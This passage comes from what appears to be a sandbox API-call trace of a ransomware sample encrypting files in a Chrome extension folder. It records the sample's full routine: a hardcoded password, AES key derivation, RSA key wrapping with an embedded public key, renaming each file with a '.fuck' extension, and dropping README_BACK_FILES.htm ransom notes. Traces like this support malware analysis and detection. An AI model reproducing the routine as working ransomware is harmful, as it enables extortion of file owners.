dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.045] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0260.046] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json.gsg", dwFileAttributes=0x2) returned 1 [0260.046] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x2e7b4f0) returned 1 [0260.048] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0260.048] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0260.048] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb300, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.048] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2e7fd40) returned 1 [0260.048] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.048] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0260.048] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x2e6ed30) returned 1 [0260.049] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6ed30, dwCertEncodingType=0x1, pInfo=0x2e27590*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e275c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e275c8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2e7cdc0) returned 1 [0260.049] CryptEncrypt (in: hKey=0x2e7cdc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0260.049] CryptEncrypt (in: hKey=0x2e7cdc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6efd8*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x2e6efd8*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0260.049] WriteFile (in: hFile=0x5d50, lpBuffer=0x2e6efd8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x2e6efd8*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0260.050] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x310, lpOverlapped=0x0) returned 1 [0260.051] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x310, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x320) returned 1 [0260.051] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x320, lpOverlapped=0x0) returned 1 [0260.057] CloseHandle (hObject=0x5d60) returned 1 [0260.058] CloseHandle (hObject=0x5d50) returned 1 [0260.058] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json"), bFailIfExists=0) returned 1 [0260.061] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json", dwFileAttributes=0x0) returned 1 [0260.061] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json.gsg")) returned 1 [0260.062] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json.fuck")) returned 1 [0260.063] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0260.063] CryptDestroyKey (hKey=0x2e7fd40) returned 1 [0260.063] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0260.063] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0260.063] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\*.*", lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0x2e7fc00 [0260.065] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.065] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.065] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0260.065] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.066] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.066] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.066] GetLastError () returned 0x0 [0260.066] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json")) returned 0x20 [0260.066] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json", dwFileAttributes=0x80) returned 1 [0260.067] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.068] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.068] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.069] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6ec20) returned 1 [0260.071] CryptCreateHash (in: hProv=0x2e6ec20, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.071] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0260.071] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb3a0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.071] CryptDeriveKey (in: hProv=0x2e6ec20, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7cd40) returned 1 [0260.071] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.071] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.071] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6e8f0) returned 1 [0260.071] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6e8f0, dwCertEncodingType=0x1, pInfo=0x2e27660*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e27690*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e27698*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7ce00) returned 1 [0260.072] CryptEncrypt (in: hKey=0x2e7ce00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.072] CryptEncrypt (in: hKey=0x2e7ce00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6f170*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6f170*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.072] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e6f170*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6f170*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.073] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x138, lpOverlapped=0x0) returned 1 [0260.078] CryptEncrypt (in: hKey=0x2e7cd40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x138, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x140) returned 1 [0260.078] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x140, lpOverlapped=0x0) returned 1 [0260.078] CloseHandle (hObject=0x5d64) returned 1 [0260.078] CloseHandle (hObject=0x5d5c) returned 1 [0260.078] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json"), bFailIfExists=0) returned 1 [0260.081] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json", dwFileAttributes=0x0) returned 1 [0260.081] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json.gsg")) returned 1 [0260.082] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json.fuck")) returned 1 [0260.083] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0260.083] CryptDestroyKey (hKey=0x2e7cd40) returned 1 [0260.083] CryptReleaseContext (hProv=0x2e6ec20, dwFlags=0x0) returned 1 [0260.084] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.084] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0260.084] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\readme_back_files.htm")) returned 0xffffffff [0260.084] AreFileApisANSI () returned 1 [0260.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0260.084] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.085] GetFileType (hFile=0x5d60) returned 0x1 [0260.085] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0260.086] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.086] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0260.086] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.086] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.086] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.086] GetLastError () returned 0x0 [0260.086] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json")) returned 0x20 [0260.087] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json", dwFileAttributes=0x80) returned 1 [0260.088] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.088] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.089] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.090] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6ee40) returned 1 [0260.092] CryptCreateHash (in: hProv=0x2e6ee40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.092] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0260.092] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb530, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.093] CryptDeriveKey (in: hProv=0x2e6ee40, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7ce40) returned 1 [0260.093] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.093] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.093] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6ea00) returned 1 [0260.093] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6ea00, dwCertEncodingType=0x1, pInfo=0x2eb2150*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb2180*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb2188*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7ce80) returned 1 [0260.093] CryptEncrypt (in: hKey=0x2e7ce80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.093] CryptEncrypt (in: hKey=0x2e7ce80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6ea88*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6ea88*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.094] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e6ea88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6ea88*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.095] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x124, lpOverlapped=0x0) returned 1 [0260.096] CryptEncrypt (in: hKey=0x2e7ce40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x124, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x130) returned 1 [0260.096] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x130, lpOverlapped=0x0) returned 1 [0260.096] CloseHandle (hObject=0x5d5c) returned 1 [0260.096] CloseHandle (hObject=0x5d64) returned 1 [0260.096] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json.gsg"), 